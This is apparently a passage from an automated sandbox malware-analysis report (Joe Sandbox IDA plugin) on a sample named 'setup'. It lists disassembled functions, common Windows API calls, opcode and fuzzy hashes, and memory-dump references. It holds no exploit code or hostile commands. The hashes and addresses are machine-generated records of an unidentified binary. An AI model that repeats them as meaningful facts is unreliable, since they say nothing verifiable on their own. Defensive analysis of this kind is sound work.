                                                                                                                                                                              • Instruction ID: 2f21026a61efca2574506b370bd03e8aab2ec8b8919aaae178d408cefae9e368
                                                                                                                                                                              • Opcode Fuzzy Hash: 379b20d9c6fe0e098901a25d945ffc111591dab4996e06e8d2937686c5f396ee
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B217CB1D04218AFDB14DF99D941BBEBBF8EB0C710F10426AF915A3281E7759940CBB5
                                                                                                                                                                              Function 00D8FF60 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6623433adaf61770b287b3ddac49c5cfca5bdbedcea1cffde8d45c5c429c772b
                                                                                                                                                                              • Instruction ID: 1ecc51e1bac55cff125245ced40a754a0ff750e4851eb81a3239267f453afb48
                                                                                                                                                                              • Opcode Fuzzy Hash: 6623433adaf61770b287b3ddac49c5cfca5bdbedcea1cffde8d45c5c429c772b
                                                                                                                                                                              • Instruction Fuzzy Hash: A2F12F71E002199FDF14CFA9D8806AEBBF1FF48314F198269E919A7390D731AD45CBA4
                                                                                                                                                                              Function 00BD0C80 Relevance: 3.3, APIs: 2, Instructions: 258windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,00000000,00000001), ref: 00BD0DAB
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,?,-00000002), ref: 00BD0F95
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: aec831aa01e340f1cfebb705ac56e4c104ec30dfaa09e6f663f5fdae670359cc
                                                                                                                                                                              • Instruction ID: 1bec4a12c237ebb3f718f42b6616b022aacf602dd93176fdc09afa432a86b981
                                                                                                                                                                              • Opcode Fuzzy Hash: aec831aa01e340f1cfebb705ac56e4c104ec30dfaa09e6f663f5fdae670359cc
                                                                                                                                                                              • Instruction Fuzzy Hash: BBB1C271A10246AFDB18DF64C595BA9FBF5FF18300F1485AAE459EB381E734E940CB90
                                                                                                                                                                              Function 00CCEF90 Relevance: 3.1, APIs: 2, Instructions: 134windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,02141699,?,00000000), ref: 00CCEFDB
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CCEFE5
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateErrorFormatHeapLastMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4114510652-0
                                                                                                                                                                              • Opcode ID: 6b61380a3323cfe0d59331337fdc1a777e48cb685eb015fe4a721dc3e81cd186
                                                                                                                                                                              • Instruction ID: 6a2f4bb5317112ed13914a26655740a21b563eb2db8ae8324c6afa6ce4f3867f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b61380a3323cfe0d59331337fdc1a777e48cb685eb015fe4a721dc3e81cd186
                                                                                                                                                                              • Instruction Fuzzy Hash: E0411172A042149FEB10CFA9C805BAEF7F8EB45B14F14426EE815E7381E7B65A00C7A0
                                                                                                                                                                              Function 00CCB7D0 Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2f5317e98c71c45bdf4de60b76ad016faef7f8577bd4b5bb4b72c80e4f47aa84
                                                                                                                                                                              • Instruction ID: 314843d529adf4742e946f922dbc9a9944f0ad78116f6b524c70a906bb6bd3c0
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f5317e98c71c45bdf4de60b76ad016faef7f8577bd4b5bb4b72c80e4f47aa84
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41AD309016899FDF24DFA9C956BEDB3B4EF04320F50826DE825A72D1DB70AE44CB50
                                                                                                                                                                              Function 00C177A0 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000FC), ref: 00C1780F
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000FC,?), ref: 00C1781D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                              • Opcode ID: ae784db7f1164126655b88bf7c655ae23bb32066895bf71fff218fadbfdae276
                                                                                                                                                                              • Instruction ID: 3ebd542b78d2e2ce3992622f8d4dc36da804d62a573508de13b30a0f27c8c996
                                                                                                                                                                              • Opcode Fuzzy Hash: ae784db7f1164126655b88bf7c655ae23bb32066895bf71fff218fadbfdae276
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F31AC71904205EFCB10DF69CA44B89FBB4FB05320F20836AE824A76E0D771AA54CBE0
                                                                                                                                                                              Function 00BDEF30 Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __set_se_translator.LIBVCRUNTIME ref: 00BDEF35
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0012AD60), ref: 00BDEF4B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2480343447-0
                                                                                                                                                                              • Opcode ID: 560d03ab789c3feb830e03c56699f3788fa101792f05cebf973c06c7941e6959
                                                                                                                                                                              • Instruction ID: 14a095b4de73d5d4a67e9e2a5cc3c3fe219450b8e3f791f7546dc29f0568528a
                                                                                                                                                                              • Opcode Fuzzy Hash: 560d03ab789c3feb830e03c56699f3788fa101792f05cebf973c06c7941e6959
                                                                                                                                                                              • Instruction Fuzzy Hash: B0D012649493845EE711A721DC0EB167FE0676B709F0805A9D45611693E7B56C4C8723
                                                                                                                                                                              Function 00C1ADE0 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionRaise__floor_pentium4
                                                                                                                                                                              • String ID: unordered_map/set too long
                                                                                                                                                                              • API String ID: 996205981-306623848
                                                                                                                                                                              • Opcode ID: eab168fe631ea12d0bb3c26a85cdfd24976d71c7a1a3159b3ba3bf043f31c3f2
                                                                                                                                                                              • Instruction ID: 959b15a1cb7f91070c23456eb8727b2f4fa16974bc246cbdb2994be70dcf7c8b
                                                                                                                                                                              • Opcode Fuzzy Hash: eab168fe631ea12d0bb3c26a85cdfd24976d71c7a1a3159b3ba3bf043f31c3f2
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B12C271A002099FCB15DF69C881AADF7F5FF49310F24826AE815AB391D730ED55CBA0
                                                                                                                                                                              Function 00BC9430 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00BC7B87,?,?,?,?,?,?,?,?,00BC79F8,?,?), ref: 00BC9480
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                                                              • Opcode ID: 7a42c233e1db03f1b22b302c5339127f3b6161caf7bf00804393800fcb0350d4
                                                                                                                                                                              • Instruction ID: 4a9da96e75ba5e7cdc85a073a9cd4aeedc483f2dc17c25361a651965fe8a14f8
                                                                                                                                                                              • Opcode Fuzzy Hash: 7a42c233e1db03f1b22b302c5339127f3b6161caf7bf00804393800fcb0350d4
                                                                                                                                                                              • Instruction Fuzzy Hash: D5F05E30004141DEF7298B54C89CF69B7EAFB59316F4945EAE058C6661D6358D46DF10
                                                                                                                                                                              Function 00D9A04C Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: \
                                                                                                                                                                              • API String ID: 0-542105448
                                                                                                                                                                              • Opcode ID: 2afe3519ef96bbb1b15e98c8d9df4b9c212f224972177faa805f8b5a319ff55a
                                                                                                                                                                              • Instruction ID: 9738199fa06fef3b04f25d35a0d0be44d8909016b05e7a82227b32f8def91c8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 2afe3519ef96bbb1b15e98c8d9df4b9c212f224972177faa805f8b5a319ff55a
                                                                                                                                                                              • Instruction Fuzzy Hash: 80F06D32A11324EFCF26CB4CC805A99B3ECEB4AB61F115096F509EB254C2B1EE40C7E5
                                                                                                                                                                              Function 00D9CD89 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 10d90245fb0b79078fd8005c2d18e1e6cfc41a6526e74b40c3e8a091080166ec
                                                                                                                                                                              • Instruction ID: 8726e5e6c3aaaedce07a8b357bb2adec078b80f5dcdc9c3efa4db34e24d11002
                                                                                                                                                                              • Opcode Fuzzy Hash: 10d90245fb0b79078fd8005c2d18e1e6cfc41a6526e74b40c3e8a091080166ec
                                                                                                                                                                              • Instruction Fuzzy Hash: ED324731E29F414DDB239A39CC22335A299AFB73C4F15D727F91AB59A9EB29C4C34110
                                                                                                                                                                              Function 00D8891C Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c8c3d1fd2f24075ce94a30956d182766c2081e505a7fb375bf3970c80b2e19a6
                                                                                                                                                                              • Instruction ID: dd25c11c0354ab817ff3958979491f1af91779283e59eabf32b363acc5a133a7
                                                                                                                                                                              • Opcode Fuzzy Hash: c8c3d1fd2f24075ce94a30956d182766c2081e505a7fb375bf3970c80b2e19a6
                                                                                                                                                                              • Instruction Fuzzy Hash: 98E1A070A006058FCB28FF68C580A7EB7F1FF45310BA8465AD5969B291DB30ED42EB71
                                                                                                                                                                              Function 00BB6CD0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 78fec2bc03020dc43dac3653a83023543a8afa90a7ae370d6e288fcd0a597f87
                                                                                                                                                                              • Instruction ID: 64ff9e009d15a0009d69f2f3cc0c29b5e9e75947e0e534668b20145bece18b5c
                                                                                                                                                                              • Opcode Fuzzy Hash: 78fec2bc03020dc43dac3653a83023543a8afa90a7ae370d6e288fcd0a597f87
                                                                                                                                                                              • Instruction Fuzzy Hash: A071F7B1801B48CFE761CF78C94478ABBF0BB05324F144A5ED5A99B3D1D3B9A648CB91
                                                                                                                                                                              Function 00C689B0 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a7ab2cdbbb9b40ed744c38407e403bd41a6196284f5b95117f2c0a129b2d83f4
                                                                                                                                                                              • Instruction ID: eafc47287aad14c36891d7e4aea566266612312638a29ea7b1c4a04142e3677d
                                                                                                                                                                              • Opcode Fuzzy Hash: a7ab2cdbbb9b40ed744c38407e403bd41a6196284f5b95117f2c0a129b2d83f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 3341F8B0905749EED704CF65C50878AFBF0BB19318F20825ED4589B781D3BAA659CBD4
                                                                                                                                                                              Function 00BBFF50 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 477c6be96c72731879ff22ef293ff3be492e738a93bb90eebad95f44ac930987
                                                                                                                                                                              • Instruction ID: fdf4df9eff69f0d88985437ff40785984546e916b999be94314a3083450a2cfd
                                                                                                                                                                              • Opcode Fuzzy Hash: 477c6be96c72731879ff22ef293ff3be492e738a93bb90eebad95f44ac930987
                                                                                                                                                                              • Instruction Fuzzy Hash: 3531D0B0405B84CEE721CF69C558387BFF0BB15728F104A5DD4A69BB91C3BAA648CB91
                                                                                                                                                                              Function 00BB9360 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
